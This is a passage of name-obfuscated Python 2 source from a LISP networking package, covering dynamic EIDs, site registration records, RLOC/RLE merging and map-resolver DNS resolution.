return ( self . dynamic_eids != None )
if 45 - 45: o0oOOo0O0Ooo
if 33 - 33: ooOoO0o % O0 % I1ii11iIi11i % o0oOOo0O0Ooo + i11iIiiIii . I1Ii111
def star_secondary_iid ( self , prefix ) :
if ( self . secondary_iid == None ) : return ( prefix )
o0OoO0000o = "," + str ( self . secondary_iid )
return ( prefix . replace ( o0OoO0000o , o0OoO0000o + "*" ) )
if 21 - 21: I1Ii111 * I1ii11iIi11i * ooOoO0o
if 73 - 73: OoOoOO00 * O0
def increment_decap_stats ( self , packet ) :
Oo0O00O = packet . udp_dport
if ( Oo0O00O == LISP_DATA_PORT ) :
I1IIiIIIii = self . get_rloc ( packet . outer_dest )
else :
if 1 - 1: OOooOOo * OoooooooOO
if 46 - 46: I1ii11iIi11i * I1Ii111 / OOooOOo / I1IiiI
if 7 - 7: OOooOOo / OoOoOO00
if 93 - 93: iIii1I11I1II1 * Ii1I - iII111i
for I1IIiIIIii in self . rloc_set :
if ( I1IIiIIIii . translated_port != 0 ) : break
if 94 - 94: iIii1I11I1II1 * iIii1I11I1II1 * I11i % i11iIiiIii
if 38 - 38: I1IiiI % I1ii11iIi11i * I1IiiI + OOooOOo - OoOoOO00
if ( I1IIiIIIii != None ) : I1IIiIIIii . stats . increment ( len ( packet . packet ) )
self . stats . increment ( len ( packet . packet ) )
if 78 - 78: OOooOOo + I1Ii111
if 41 - 41: I11i + Oo0Ooo . Oo0Ooo / iII111i . OoOoOO00
def rtrs_in_rloc_set ( self ) :
for I1IIiIIIii in self . rloc_set :
if ( I1IIiIIIii . is_rtr ( ) ) : return ( True )
if 1 - 1: ooOoO0o + iII111i % i11iIiiIii / OoOoOO00
return ( False )
if 98 - 98: IiII
if 75 - 75: OoooooooOO % IiII + Ii1I - i1IIi / OoooooooOO
def add_recent_source ( self , source ) :
self . recent_sources [ source . print_address ( ) ] = lisp_get_timestamp ( )
if 57 - 57: iII111i
if 18 - 18: II111iiii % i11iIiiIii + I11i - OOooOOo
if 100 - 100: o0oOOo0O0Ooo / Ii1I - iIii1I11I1II1 / oO0o
class lisp_dynamic_eid ( ) :
def __init__ ( self ) :
self . dynamic_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . uptime = lisp_get_timestamp ( )
self . interface = None
self . last_packet = None
self . timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
if 68 - 68: I11i / II111iiii * oO0o . II111iiii * OOooOOo
if 78 - 78: I11i * OoO0O00 / II111iiii
def get_timeout ( self , interface ) :
try :
o0o0OoOO0O0 = lisp_myinterfaces [ interface ]
self . timeout = o0o0OoOO0O0 . dynamic_eid_timeout
except :
self . timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
if 85 - 85: i1IIi . i11iIiiIii + ooOoO0o
if 89 - 89: iIii1I11I1II1 . I1Ii111
if 43 - 43: Oo0Ooo + o0oOOo0O0Ooo % o0oOOo0O0Ooo % I1ii11iIi11i / iIii1I11I1II1 . I1ii11iIi11i
if 59 - 59: IiII . OoO0O00 - OoooooooOO . O0
class lisp_group_mapping ( ) :
def __init__ ( self , group_name , ms_name , group_prefix , sources , rle_addr ) :
self . group_name = group_name
self . group_prefix = group_prefix
self . use_ms_name = ms_name
self . sources = sources
self . rle_address = rle_addr
if 33 - 33: Ii1I
if 95 - 95: OoooooooOO + OoO0O00 * ooOoO0o
def add_group ( self ) :
lisp_group_mapping_list [ self . group_name ] = self
if 40 - 40: I1IiiI / OOooOOo * Ii1I
if 98 - 98: I1IiiI
if 4 - 4: I1IiiI % O0 / Oo0Ooo / O0
if 90 - 90: ooOoO0o - O0 . IiII - O0 . iIii1I11I1II1
if 42 - 42: I1ii11iIi11i
if 51 - 51: iII111i % i11iIiiIii . OoO0O00 . IiII - OoOoOO00 * i1IIi
if 14 - 14: I1ii11iIi11i . OoO0O00
if 26 - 26: iII111i / ooOoO0o / Oo0Ooo / Oo0Ooo . I1ii11iIi11i * OOooOOo
if 25 - 25: IiII % I1IiiI / O0 % OOooOOo - OoooooooOO
if 29 - 29: O0 + iII111i
def lisp_is_group_more_specific ( group_str , group_mapping ) :
o0OoO0000o = group_mapping . group_prefix . instance_id
OO00O = group_mapping . group_prefix . mask_len
IIi1iiIII11 = lisp_address ( LISP_AFI_IPV4 , group_str , 32 , o0OoO0000o )
if ( IIi1iiIII11 . is_more_specific ( group_mapping . group_prefix ) ) : return ( OO00O )
return ( - 1 )
if 4 - 4: I11i * I11i - Ii1I * oO0o . I1ii11iIi11i % o0oOOo0O0Ooo
if 33 - 33: Ii1I * i11iIiiIii / O0 . Oo0Ooo + i1IIi . OoOoOO00
if 76 - 76: OoooooooOO - O0
if 17 - 17: Oo0Ooo % I1Ii111 . oO0o - O0
if 32 - 32: O0 % O0
if 66 - 66: iII111i / i1IIi - Oo0Ooo . Ii1I
if 65 - 65: I1ii11iIi11i % ooOoO0o - OoOoOO00 + ooOoO0o + Oo0Ooo
def lisp_lookup_group ( group ) :
oOOO000 = None
for O0OoOooO0O00o in lisp_group_mapping_list . values ( ) :
OO00O = lisp_is_group_more_specific ( group , O0OoOooO0O00o )
if ( OO00O == - 1 ) : continue
if ( oOOO000 == None or OO00O > oOOO000 . group_prefix . mask_len ) : oOOO000 = O0OoOooO0O00o
if 39 - 39: OoooooooOO % i11iIiiIii / IiII - ooOoO0o
return ( oOOO000 )
if 74 - 74: iIii1I11I1II1 % II111iiii + IiII
if 71 - 71: I1IiiI / O0 * i1IIi . i1IIi + Oo0Ooo
lisp_site_flags = {
"P" : "ETR is {}Requesting Map-Server to Proxy Map-Reply" ,
"S" : "ETR is {}LISP-SEC capable" ,
"I" : "xTR-ID and site-ID are {}included in Map-Register" ,
"T" : "Use Map-Register TTL field to timeout registration is {}set" ,
"R" : "Merging registrations are {}requested" ,
"M" : "ETR is {}a LISP Mobile-Node" ,
"N" : "ETR is {}requesting Map-Notify messages from Map-Server"
}
if 32 - 32: i1IIi * I1Ii111 % I1IiiI / IiII . I1Ii111
class lisp_site ( ) :
def __init__ ( self ) :
self . site_name = ""
self . description = ""
self . shutdown = False
self . auth_sha1_or_sha2 = False
self . auth_key = { }
self . encryption_key = None
self . allowed_prefixes = { }
self . allowed_prefixes_sorted = [ ]
self . allowed_rlocs = { }
self . map_notifies_sent = 0
self . map_notify_acks_received = 0
if 11 - 11: OOooOOo
if 25 - 25: i1IIi
if 99 - 99: OOooOOo + OoooooooOO . I1Ii111 * Oo0Ooo % oO0o
class lisp_site_eid ( ) :
def __init__ ( self , site ) :
self . site = site
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . first_registered = 0
self . last_registered = 0
self . last_registerer = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self . registered = False
self . registered_rlocs = [ ]
self . auth_sha1_or_sha2 = False
self . individual_registrations = { }
self . map_registers_received = 0
self . proxy_reply_requested = False
self . force_proxy_reply = False
self . force_nat_proxy_reply = False
self . force_ttl = None
self . pitr_proxy_reply_drop = False
self . proxy_reply_action = ""
self . lisp_sec_present = False
self . map_notify_requested = False
self . mobile_node_requested = False
self . echo_nonce_capable = False
self . use_register_ttl_requested = False
self . merge_register_requested = False
self . xtr_id_present = False
self . xtr_id = 0
self . site_id = 0
self . accept_more_specifics = False
self . parent_for_more_specifics = None
self . dynamic = False
self . more_specific_registrations = [ ]
self . source_cache = None
self . inconsistent_registration = False
self . policy = None
self . require_signature = False
self . encrypt_json = False
if 75 - 75: iII111i
if 8 - 8: I1ii11iIi11i . I11i / I1ii11iIi11i - i1IIi
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 22 - 22: OOooOOo
if 7 - 7: O0 - I1ii11iIi11i - OoO0O00 * I1Ii111
def print_flags ( self , html ) :
if ( html == False ) :
Oo0Ooo0O0 = "{}-{}-{}-{}-{}-{}-{}" . format ( "P" if self . proxy_reply_requested else "p" ,
# IiII
"S" if self . lisp_sec_present else "s" ,
"I" if self . xtr_id_present else "i" ,
"T" if self . use_register_ttl_requested else "t" ,
"R" if self . merge_register_requested else "r" ,
"M" if self . mobile_node_requested else "m" ,
"N" if self . map_notify_requested else "n" )
else :
Ooo0OO0O0oO = self . print_flags ( False )
Ooo0OO0O0oO = Ooo0OO0O0oO . split ( "-" )
Oo0Ooo0O0 = ""
for OO00OOoo in Ooo0OO0O0oO :
I1I1i1IIII1 = lisp_site_flags [ OO00OOoo . upper ( ) ]
I1I1i1IIII1 = I1I1i1IIII1 . format ( "" if OO00OOoo . isupper ( ) else "not " )
Oo0Ooo0O0 += lisp_span ( OO00OOoo , I1I1i1IIII1 )
if ( OO00OOoo . lower ( ) != "n" ) : Oo0Ooo0O0 += "-"
if 46 - 46: OoO0O00 % OoO0O00 . O0 + II111iiii
if 42 - 42: OOooOOo * I1Ii111
return ( Oo0Ooo0O0 )
if 53 - 53: II111iiii % OOooOOo / I1ii11iIi11i * OoOoOO00 % I1ii11iIi11i * iII111i
if 91 - 91: iII111i . OoooooooOO
def copy_state_to_parent ( self , child ) :
self . xtr_id = child . xtr_id
self . site_id = child . site_id
self . first_registered = child . first_registered
self . last_registered = child . last_registered
self . last_registerer = child . last_registerer
self . register_ttl = child . register_ttl
if ( self . registered == False ) :
self . first_registered = lisp_get_timestamp ( )
if 90 - 90: i11iIiiIii - I1IiiI
self . auth_sha1_or_sha2 = child . auth_sha1_or_sha2
self . registered = child . registered
self . proxy_reply_requested = child . proxy_reply_requested
self . lisp_sec_present = child . lisp_sec_present
self . xtr_id_present = child . xtr_id_present
self . use_register_ttl_requested = child . use_register_ttl_requested
self . merge_register_requested = child . merge_register_requested
self . mobile_node_requested = child . mobile_node_requested
self . map_notify_requested = child . map_notify_requested
if 39 - 39: iII111i % OoooooooOO % Ii1I % I1IiiI
if 63 - 63: OoO0O00 - I1Ii111 - II111iiii
def build_sort_key ( self ) :
OoOooO00 = lisp_cache ( )
OOoOOO , Oo000O000 = OoOooO00 . build_key ( self . eid )
ooOOOo = ""
if ( self . group . is_null ( ) == False ) :
iiiIiII , ooOOOo = OoOooO00 . build_key ( self . group )
ooOOOo = "-" + ooOOOo [ 0 : 12 ] + "-" + str ( iiiIiII ) + "-" + ooOOOo [ 12 : : ]
if 93 - 93: I1ii11iIi11i % O0 + I11i
Oo000O000 = Oo000O000 [ 0 : 12 ] + "-" + str ( OOoOOO ) + "-" + Oo000O000 [ 12 : : ] + ooOOOo
del ( OoOooO00 )
return ( Oo000O000 )
if 31 - 31: OOooOOo + O0 * OOooOOo
if 81 - 81: i11iIiiIii + iIii1I11I1II1 . i11iIiiIii / OOooOOo / iII111i
def merge_in_site_eid ( self , child ) :
Ii1I1i1I1 = False
if ( self . group . is_null ( ) ) :
self . merge_rlocs_in_site_eid ( )
else :
Ii1I1i1I1 = self . merge_rles_in_site_eid ( )
if 37 - 37: i1IIi / I11i . iII111i - II111iiii
if 66 - 66: Ii1I + OoOoOO00 - I11i / o0oOOo0O0Ooo + iIii1I11I1II1
if 66 - 66: OOooOOo - I1Ii111 - OoOoOO00 - i1IIi * Ii1I
if 23 - 23: IiII - OoOoOO00 . OoO0O00
if 81 - 81: I1Ii111 / I1ii11iIi11i
if 69 - 69: I1IiiI
if ( child != None ) :
self . copy_state_to_parent ( child )
self . map_registers_received += 1
if 79 - 79: ooOoO0o
return ( Ii1I1i1I1 )
if 83 - 83: I1Ii111 % II111iiii
if 89 - 89: Ii1I . I11i
def copy_rloc_records ( self ) :
o00o0 = [ ]
for i1III111 in self . registered_rlocs :
o00o0 . append ( copy . deepcopy ( i1III111 ) )
if 36 - 36: iIii1I11I1II1 . iII111i * I1IiiI . I1IiiI - IiII
return ( o00o0 )
if 39 - 39: O0 / ooOoO0o + I11i - OoOoOO00 * o0oOOo0O0Ooo - OoO0O00
if 97 - 97: i11iIiiIii / O0 % OoO0O00
def merge_rlocs_in_site_eid ( self ) :
self . registered_rlocs = [ ]
for o0o000 in self . individual_registrations . values ( ) :
if ( self . site_id != o0o000 . site_id ) : continue
if ( o0o000 . registered == False ) : continue
self . registered_rlocs += o0o000 . copy_rloc_records ( )
if 88 - 88: i1IIi . I1IiiI
if 8 - 8: I1ii11iIi11i . OoO0O00 % o0oOOo0O0Ooo / O0
if 51 - 51: oO0o + Ii1I * Ii1I * I1ii11iIi11i % I11i - I1ii11iIi11i
if 15 - 15: i1IIi / OoO0O00 - Oo0Ooo
if 74 - 74: o0oOOo0O0Ooo % Ii1I - II111iiii / ooOoO0o
if 84 - 84: I1IiiI + OOooOOo
o00o0 = [ ]
for i1III111 in self . registered_rlocs :
if ( i1III111 . rloc . is_null ( ) or len ( o00o0 ) == 0 ) :
o00o0 . append ( i1III111 )
continue
if 80 - 80: OOooOOo / OoOoOO00
for o0OOooOooo in o00o0 :
if ( o0OOooOooo . rloc . is_null ( ) ) : continue
if ( i1III111 . rloc . is_exact_match ( o0OOooOooo . rloc ) ) : break
if 36 - 36: iII111i % I1ii11iIi11i + OoOoOO00 - i11iIiiIii % II111iiii % I11i
if ( o0OOooOooo == o00o0 [ - 1 ] ) : o00o0 . append ( i1III111 )
if 92 - 92: O0 * OoooooooOO + I1ii11iIi11i / IiII
self . registered_rlocs = o00o0
if 97 - 97: o0oOOo0O0Ooo . Ii1I + I1Ii111
if 72 - 72: i11iIiiIii . iII111i . Ii1I * I1ii11iIi11i
if 49 - 49: OoOoOO00 - O0 % I11i - ooOoO0o * OOooOOo
if 58 - 58: OoooooooOO - OOooOOo * oO0o / Ii1I . IiII
if ( len ( self . registered_rlocs ) == 0 ) : self . registered = False
return
if 50 - 50: IiII . OOooOOo + I1ii11iIi11i - OoooooooOO
if 2 - 2: o0oOOo0O0Ooo % ooOoO0o / O0 / i11iIiiIii
def merge_rles_in_site_eid ( self ) :
if 91 - 91: II111iiii * o0oOOo0O0Ooo
if 20 - 20: iIii1I11I1II1 % Oo0Ooo * OoOoOO00 % IiII
if 93 - 93: I11i * iIii1I11I1II1 * oO0o
if 74 - 74: I1IiiI
I1i11111Iiii = { }
for i1III111 in self . registered_rlocs :
if ( i1III111 . rle == None ) : continue
for Iii in i1III111 . rle . rle_nodes :
IiiIIi1 = Iii . address . print_address_no_iid ( )
I1i11111Iiii [ IiiIIi1 ] = Iii . address
if 13 - 13: i1IIi % i1IIi % ooOoO0o + IiII * II111iiii * OOooOOo
break
if 66 - 66: iIii1I11I1II1
if 92 - 92: OOooOOo * o0oOOo0O0Ooo - IiII
if 83 - 83: OoO0O00 % I1IiiI % OOooOOo / oO0o + I1IiiI
if 94 - 94: OoOoOO00 . O0
if 86 - 86: oO0o % Oo0Ooo . OoooooooOO / OOooOOo / i1IIi
self . merge_rlocs_in_site_eid ( )
if 65 - 65: Ii1I . OoooooooOO % IiII - o0oOOo0O0Ooo . OOooOOo . II111iiii
if 100 - 100: ooOoO0o / Oo0Ooo + I1ii11iIi11i + OoooooooOO
if 100 - 100: I11i . OOooOOo - II111iiii % I11i % iIii1I11I1II1
if 4 - 4: o0oOOo0O0Ooo . iII111i / O0
if 13 - 13: iII111i / IiII
if 28 - 28: iII111i
if 97 - 97: iIii1I11I1II1
if 18 - 18: OOooOOo
Ooooo000 = [ ]
for i1III111 in self . registered_rlocs :
if ( self . registered_rlocs . index ( i1III111 ) == 0 ) :
Ooooo000 . append ( i1III111 )
continue
if 13 - 13: iIii1I11I1II1 - I1IiiI % o0oOOo0O0Ooo * iIii1I11I1II1
if ( i1III111 . rle == None ) : Ooooo000 . append ( i1III111 )
if 99 - 99: OoooooooOO / II111iiii . I1Ii111
self . registered_rlocs = Ooooo000
if 62 - 62: OOooOOo . iII111i . I1ii11iIi11i
if 23 - 23: O0
if 33 - 33: ooOoO0o - iII111i % IiII
if 67 - 67: II111iiii
if 66 - 66: iIii1I11I1II1 / OOooOOo
if 65 - 65: IiII . oO0o + O0 - i11iIiiIii + iIii1I11I1II1
if 82 - 82: iIii1I11I1II1 * iII111i + iIii1I11I1II1 / OoO0O00 + O0
iI1Ii11 = lisp_rle ( "" )
o0000OoooO0Oo = { }
oo0O0OOooO0 = None
for o0o000 in self . individual_registrations . values ( ) :
if ( o0o000 . registered == False ) : continue
I1i1i1IiI = o0o000 . registered_rlocs [ 0 ] . rle
if ( I1i1i1IiI == None ) : continue
if 38 - 38: O0 % I1IiiI * OOooOOo + OoOoOO00
oo0O0OOooO0 = o0o000 . registered_rlocs [ 0 ] . rloc_name
for O0o0O00 in I1i1i1IiI . rle_nodes :
IiiIIi1 = O0o0O00 . address . print_address_no_iid ( )
if ( o0000OoooO0Oo . has_key ( IiiIIi1 ) ) : break
if 32 - 32: i1IIi . I1IiiI
Iii = lisp_rle_node ( )
Iii . address . copy_address ( O0o0O00 . address )
Iii . level = O0o0O00 . level
Iii . rloc_name = oo0O0OOooO0
iI1Ii11 . rle_nodes . append ( Iii )
o0000OoooO0Oo [ IiiIIi1 ] = O0o0O00 . address
if 58 - 58: Ii1I
if 25 - 25: oO0o / i11iIiiIii + i11iIiiIii % IiII - o0oOOo0O0Ooo
if 97 - 97: I1ii11iIi11i % iII111i * ooOoO0o % OOooOOo . I1IiiI - i11iIiiIii
if 2 - 2: IiII . o0oOOo0O0Ooo % II111iiii
if 69 - 69: Ii1I
if 75 - 75: I1IiiI
if ( len ( iI1Ii11 . rle_nodes ) == 0 ) : iI1Ii11 = None
if ( len ( self . registered_rlocs ) != 0 ) :
self . registered_rlocs [ 0 ] . rle = iI1Ii11
if ( oo0O0OOooO0 ) : self . registered_rlocs [ 0 ] . rloc_name = None
if 55 - 55: i11iIiiIii - I1IiiI . oO0o - OoooooooOO
if 44 - 44: I1Ii111
if 98 - 98: I1IiiI % OOooOOo % iII111i
if 15 - 15: OoO0O00
if 52 - 52: II111iiii / ooOoO0o
if ( I1i11111Iiii . keys ( ) == o0000OoooO0Oo . keys ( ) ) : return ( False )
if 23 - 23: i11iIiiIii % OoO0O00 - o0oOOo0O0Ooo + OoooooooOO
lprint ( "{} {} from {} to {}" . format ( green ( self . print_eid_tuple ( ) , False ) , bold ( "RLE change" , False ) ,
# ooOoO0o
I1i11111Iiii . keys ( ) , o0000OoooO0Oo . keys ( ) ) )
if 18 - 18: I1IiiI . oO0o . I1IiiI + ooOoO0o - II111iiii
return ( True )
if 6 - 6: Oo0Ooo + Oo0Ooo - OoOoOO00 - II111iiii
if 25 - 25: i11iIiiIii + II111iiii * OOooOOo % OOooOOo
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_sites_by_eid . add_cache ( self . eid , self )
else :
iIiIi1I = lisp_sites_by_eid . lookup_cache ( self . group , True )
if ( iIiIi1I == None ) :
iIiIi1I = lisp_site_eid ( self . site )
iIiIi1I . eid . copy_address ( self . group )
iIiIi1I . group . copy_address ( self . group )
lisp_sites_by_eid . add_cache ( self . group , iIiIi1I )
if 87 - 87: I11i % Ii1I % Oo0Ooo . II111iiii / oO0o
if 19 - 19: O0 . OOooOOo + I1Ii111 * I1ii11iIi11i
if 91 - 91: o0oOOo0O0Ooo / oO0o . o0oOOo0O0Ooo + IiII + ooOoO0o . I1Ii111
if 90 - 90: i1IIi + oO0o * oO0o / ooOoO0o . IiII
if 98 - 98: I11i % OoO0O00 . iII111i - o0oOOo0O0Ooo
iIiIi1I . parent_for_more_specifics = self . parent_for_more_specifics
if 92 - 92: I11i
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( iIiIi1I . group )
iIiIi1I . add_source_entry ( self )
if 34 - 34: I1IiiI % iIii1I11I1II1 . I1ii11iIi11i * Oo0Ooo * iIii1I11I1II1 / O0
if 98 - 98: iII111i % IiII + OoO0O00
if 23 - 23: OOooOOo
def delete_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_sites_by_eid . delete_cache ( self . eid )
else :
iIiIi1I = lisp_sites_by_eid . lookup_cache ( self . group , True )
if ( iIiIi1I == None ) : return
if 83 - 83: I1ii11iIi11i / O0 * II111iiii + IiII + Oo0Ooo
o0o000 = iIiIi1I . lookup_source_cache ( self . eid , True )
if ( o0o000 == None ) : return
if 99 - 99: II111iiii + O0
if ( iIiIi1I . source_cache == None ) : return
if 94 - 94: ooOoO0o * ooOoO0o + o0oOOo0O0Ooo . iII111i % iIii1I11I1II1 + Ii1I
iIiIi1I . source_cache . delete_cache ( self . eid )
if ( iIiIi1I . source_cache . cache_size ( ) == 0 ) :
lisp_sites_by_eid . delete_cache ( self . group )
if 88 - 88: Oo0Ooo . iII111i
if 89 - 89: OOooOOo + I1Ii111 % i11iIiiIii + Oo0Ooo / Oo0Ooo + OoO0O00
if 9 - 9: OoOoOO00 % i1IIi + IiII
if 19 - 19: I1Ii111 - II111iiii / I1Ii111 + I1IiiI - OoooooooOO + o0oOOo0O0Ooo
def add_source_entry ( self , source_se ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_se . eid , source_se )
if 100 - 100: OoO0O00 / OoOoOO00 / OOooOOo / OoO0O00
if 95 - 95: ooOoO0o
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 95 - 95: Ii1I + i1IIi . I1IiiI % I1Ii111 / Ii1I * O0
if 68 - 68: I1Ii111 - IiII - oO0o - Oo0Ooo - o0oOOo0O0Ooo
def is_star_g ( self ) :
if ( self . group . is_null ( ) ) : return ( False )
return ( self . eid . is_exact_match ( self . group ) )
if 32 - 32: OoOoOO00 % i11iIiiIii
if 53 - 53: I1Ii111 * Ii1I / IiII . i1IIi * II111iiii / o0oOOo0O0Ooo
def eid_record_matches ( self , eid_record ) :
if ( self . eid . is_exact_match ( eid_record . eid ) == False ) : return ( False )
if ( eid_record . group . is_null ( ) ) : return ( True )
return ( eid_record . group . is_exact_match ( self . group ) )
if 44 - 44: I1Ii111 + ooOoO0o
if 15 - 15: I11i + OoO0O00 + OoOoOO00
def inherit_from_ams_parent ( self ) :
O0Ii1IiiiI = self . parent_for_more_specifics
if ( O0Ii1IiiiI == None ) : return
self . force_proxy_reply = O0Ii1IiiiI . force_proxy_reply
self . force_nat_proxy_reply = O0Ii1IiiiI . force_nat_proxy_reply
self . force_ttl = O0Ii1IiiiI . force_ttl
self . pitr_proxy_reply_drop = O0Ii1IiiiI . pitr_proxy_reply_drop
self . proxy_reply_action = O0Ii1IiiiI . proxy_reply_action
self . echo_nonce_capable = O0Ii1IiiiI . echo_nonce_capable
self . policy = O0Ii1IiiiI . policy
self . require_signature = O0Ii1IiiiI . require_signature
self . encrypt_json = O0Ii1IiiiI . encrypt_json
if 100 - 100: I1Ii111
if 78 - 78: OoOoOO00
def rtrs_in_rloc_set ( self ) :
for i1III111 in self . registered_rlocs :
if ( i1III111 . is_rtr ( ) ) : return ( True )
if 16 - 16: I1Ii111 % OoO0O00 - OoO0O00 % OoOoOO00 * OoO0O00
return ( False )
if 36 - 36: OoOoOO00 * II111iiii . OoooooooOO * I11i . I11i
if 13 - 13: I1ii11iIi11i * II111iiii
def is_rtr_in_rloc_set ( self , rtr_rloc ) :
for i1III111 in self . registered_rlocs :
if ( i1III111 . rloc . is_exact_match ( rtr_rloc ) == False ) : continue
if ( i1III111 . is_rtr ( ) ) : return ( True )
if 93 - 93: OOooOOo / O0 - o0oOOo0O0Ooo + OoO0O00 * I1IiiI
return ( False )
if 53 - 53: I1ii11iIi11i
if 91 - 91: o0oOOo0O0Ooo - I1ii11iIi11i . i1IIi
def is_rloc_in_rloc_set ( self , rloc ) :
for i1III111 in self . registered_rlocs :
if ( i1III111 . rle ) :
for iI1Ii11 in i1III111 . rle . rle_nodes :
if ( iI1Ii11 . address . is_exact_match ( rloc ) ) : return ( True )
if 64 - 64: ooOoO0o
if 23 - 23: Oo0Ooo . OoO0O00
if ( i1III111 . rloc . is_exact_match ( rloc ) ) : return ( True )
if 49 - 49: oO0o % i11iIiiIii * Ii1I
return ( False )
if 9 - 9: Oo0Ooo - OoO0O00 + ooOoO0o / o0oOOo0O0Ooo
if 61 - 61: O0 - i11iIiiIii * o0oOOo0O0Ooo
def do_rloc_sets_match ( self , prev_rloc_set ) :
if ( len ( self . registered_rlocs ) != len ( prev_rloc_set ) ) : return ( False )
if 92 - 92: Oo0Ooo + OOooOOo - i11iIiiIii
for i1III111 in prev_rloc_set :
OoOO0O = i1III111 . rloc
if ( self . is_rloc_in_rloc_set ( OoOO0O ) == False ) : return ( False )
if 26 - 26: O0 % Oo0Ooo + ooOoO0o - Ii1I . Oo0Ooo
return ( True )
if 33 - 33: I1Ii111 / iII111i . I1Ii111 % II111iiii
if 52 - 52: I1ii11iIi11i
if 1 - 1: II111iiii + I1ii11iIi11i * OoOoOO00 % ooOoO0o - iII111i % OoooooooOO
class lisp_mr ( ) :
def __init__ ( self , addr_str , dns_name , mr_name ) :
self . mr_name = mr_name if ( mr_name != None ) else "all"
self . dns_name = dns_name
self . map_resolver = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . last_dns_resolve = None
self . a_record_index = 0
if ( addr_str ) :
self . map_resolver . store_address ( addr_str )
self . insert_mr ( )
else :
self . resolve_dns_name ( )
if 77 - 77: iII111i + o0oOOo0O0Ooo
self . last_used = 0
self . last_reply = 0
self . last_nonce = 0
self . map_requests_sent = 0
self . neg_map_replies_received = 0
self . total_rtt = 0
if 60 - 60: I1ii11iIi11i
if 23 - 23: iII111i % I1IiiI % I1Ii111 * oO0o * I1IiiI
def resolve_dns_name ( self ) :
if ( self . dns_name == None ) : return
if ( self . last_dns_resolve and
time . time ( ) - self . last_dns_resolve < 30 ) : return
if 74 - 74: O0 / I11i . Oo0Ooo / I11i % OoO0O00 % o0oOOo0O0Ooo
try :
IIiiI = socket . gethostbyname_ex ( self . dns_name )
self . last_dns_resolve = lisp_get_timestamp ( )
oOOooOooO = IIiiI [ 2 ]
except :
return
if 59 - 59: OoOoOO00 . OoooooooOO
if 93 - 93: Oo0Ooo - i1IIi - oO0o - I11i + O0 - iIii1I11I1II1
if 68 - 68: i1IIi / OoO0O00 * i1IIi - OoooooooOO / II111iiii * OoooooooOO
if 37 - 37: OoooooooOO % I1IiiI * I1IiiI
if 13 - 13: oO0o
if 43 - 43: oO0o / Ii1I % OOooOOo
if ( len ( oOOooOooO ) <= self . a_record_index ) :
self . delete_mr ( )
return
if 45 - 45: II111iiii
if 41 - 41: Ii1I / OOooOOo * Oo0Ooo . O0 - i11iIiiIii
IiiIIi1 = oOOooOooO [ self . a_record_index ]
if ( IiiIIi1 != self . map_resolver . print_address_no_iid ( ) ) :
self . delete_mr ( )
self . map_resolver . store_address ( IiiIIi1 )
self . insert_mr ( )
if 77 - 77: o0oOOo0O0Ooo + I1IiiI + I1Ii111 / I1ii11iIi11i * i1IIi
if 37 - 37: O0 + iIii1I11I1II1 % IiII * oO0o
if 43 - 43: OOooOOo . O0
if 76 - 76: OOooOOo * OoooooooOO / IiII . OoO0O00 + II111iiii
if 23 - 23: OoO0O00 - OoooooooOO * I11i . iIii1I11I1II1 / o0oOOo0O0Ooo + oO0o
if 74 - 74: II111iiii / I1IiiI * O0 * OoO0O00 . I11i
if ( lisp_is_decent_dns_suffix ( self . dns_name ) == False ) : return
if ( self . a_record_index != 0 ) : return
if 74 - 74: O0 . i1IIi / I1ii11iIi11i + o0oOOo0O0Ooo
for IiiIIi1 in oOOooOooO [ 1 : : ] :
OO0o = lisp_address ( LISP_AFI_NONE , IiiIIi1 , 0 , 0 )
I1I1iiii111II = lisp_get_map_resolver ( OO0o , None )
if ( I1I1iiii111II != None and I1I1iiii111II . a_record_index == oOOooOooO . index ( IiiIIi1 ) ) :
continue
if 24 - 24: ooOoO0o % I1Ii111 + OoO0O00 * o0oOOo0O0Ooo % O0 - i11iIiiIii
I1I1iiii111II = lisp_mr ( IiiIIi1 , None , None )
I1I1iiii111II . a_record_index = oOOooOooO . index ( IiiIIi1 )
I1I1iiii111II . dns_name = self . dns_name
I1I1iiii111II . last_dns_resolve = lisp_get_timestamp ( )
if 49 - 49: o0oOOo0O0Ooo / OoOoOO00 + iII111i
if 85 - 85: I1IiiI - o0oOOo0O0Ooo
if 86 - 86: II111iiii + Ii1I * Ii1I
if 26 - 26: o0oOOo0O0Ooo + oO0o * i11iIiiIii / II111iiii
if 86 - 86: Ii1I
oOoOOoo0OoO = [ ]
for I1I1iiii111II in lisp_map_resolvers_list . values ( ) :
if ( self . dns_name != I1I1iiii111II . dns_name ) : continue
OO0o = I1I1iiii111II . map_resolver . print_address_no_iid ( )
if ( OO0o in oOOooOooO ) : continue
oOoOOoo0OoO . append ( I1I1iiii111II )
if 78 - 78: I1Ii111 % i1IIi * I11i
for I1I1iiii111II in oOoOOoo0OoO : I1I1iiii111II . delete_mr ( )
if 59 - 59: OoOoOO00 % OoO0O00 % i11iIiiIii . II111iiii % I1ii11iIi11i + i1IIi
if 99 - 99: I11i + IiII * I1Ii111 - OOooOOo - i1IIi
def insert_mr ( self ) :
Oo000O000 = self . mr_name + self . map_resolver . print_address ( )
lisp_map_resolvers_list [ Oo000O000 ] = self
if 77 - 77: I11i . IiII / OoO0O00 / I1Ii111
if 8 - 8: o0oOOo0O0Ooo + iII111i / OoO0O00 * ooOoO0o - oO0o . iII111i
def delete_mr ( self ) :
Oo000O000 = self . mr_name + self . map_resolver . print_address ( )
if ( lisp_map_resolvers_list . has_key ( Oo000O000 ) == False ) : return
lisp_map_resolvers_list . pop ( Oo000O000 )
if 32 - 32: OoooooooOO . I1Ii111 - I1ii11iIi11i
if 29 - 29: OoO0O00
if 33 - 33: I1ii11iIi11i - O0
class lisp_ddt_root ( ) :
def __init__ ( self ) :
